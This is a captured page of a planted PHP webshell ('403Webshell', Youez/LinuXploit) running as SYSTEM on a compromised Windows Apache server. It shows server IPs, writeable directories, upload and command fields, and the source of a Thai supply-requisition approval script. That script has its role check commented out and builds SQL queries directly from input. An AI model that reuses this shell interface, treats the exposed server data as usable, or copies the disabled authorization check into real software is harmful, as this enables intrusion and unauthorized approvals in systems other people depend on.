403Webshell
Server IP : 172.67.187.206  /  Your IP : 172.71.28.156
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Inetpub/www/supply_system/requisitions/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /Inetpub/www/supply_system/requisitions/action_head_ack.php
<?php
include_once __DIR__ . '/../config.php';
include_once __DIR__ . '/../functions.php';
include_once __DIR__ . '/../includes/auth_check.php';
// requireRole(['head_of_department']);

$message = '';
$message_type = 'danger';

if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST['requisition_id'])) {
    $req_id = intval($_POST['requisition_id']);
    $user_id = getUserData('user_id');
    $user_dept_id = getUserData('department_id');
    $now_datetime = date('Y-m-d H:i:s');

    // --- Validate if the user can acknowledge this request ---
    $sql_check = "SELECT id, status, department_id, requisition_no, requested_by FROM requisitions WHERE id = $req_id";
    $result_check = mysqli_query($conn, $sql_check);

    if ($result_check && $req = mysqli_fetch_assoc($result_check)) {
        if ($req['status'] == 'pending' && $req['department_id'] == $user_dept_id) {
            // --- Update Status ---
            $sql_update = "UPDATE requisitions
                           SET status = 'head_approved',
                               head_approved_by = $user_id,
                               head_approved_date = '$now_datetime'
                           WHERE id = $req_id";

            if (mysqli_query($conn, $sql_update)) {
                // --- TODO: Notification Logic ---
                // 1. Notify Supply Manager (user_type = 'supply_manager')
                // 2. Notify Original Requester (user_id = $req['requested_by'])

                $message = "รับทราบคำขอเบิกเลขที่ " . htmlspecialchars($req['requisition_no']) . " เรียบร้อยแล้ว ระบบได้ส่งคำขอไปยังฝ่ายพัสดุเพื่อดำเนินการต่อ";
                $message_type = 'success';
                $_SESSION['message'] = $message;
                $_SESSION['message_type'] = $message_type;
                mysqli_close($conn);
                redirect('list_pending_head.php'); // Redirect back to the pending list

            } else {
                $message = "เกิดข้อผิดพลาดในการอัปเดตสถานะ: " . mysqli_error($conn);
            }
        } else {
            $message = "ไม่สามารถดำเนินการได้ สถานะปัจจุบันไม่ใช่ 'รอรับทราบ' หรือคุณไม่ใช่ ผอ.กลุ่ม ของคำขอนี้";
        }
        mysqli_free_result($result_check);
    } else {
        $message = "ไม่พบคำขอเบิก ID: $req_id";
    }

} else {
    // Redirect if accessed incorrectly
    redirect('../index.php');
}

// --- Display Error Message if Redirect Failed ---
if (!empty($message) && $message_type == 'danger') {
    $page_title = "ผลการดำเนินการ";
    include_once __DIR__ . '/../includes/header.php';
    include_once __DIR__ . '/../includes/sidebar_head.php';
    ?>
    <div class="container-fluid">
        <h1 class="mt-4">ผลการดำเนินการ</h1>
        <div class="alert alert-<?php echo $message_type; ?>" role="alert">
            <?php echo $message; ?>
        </div>
        <a href="list_pending_head.php" class="btn btn-secondary"><i class="bi bi-arrow-left"></i> กลับ</a>
    </div>
    <?php
    include_once __DIR__ . '/../includes/footer.php';
    if (isset($conn) && $conn) mysqli_close($conn);
}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit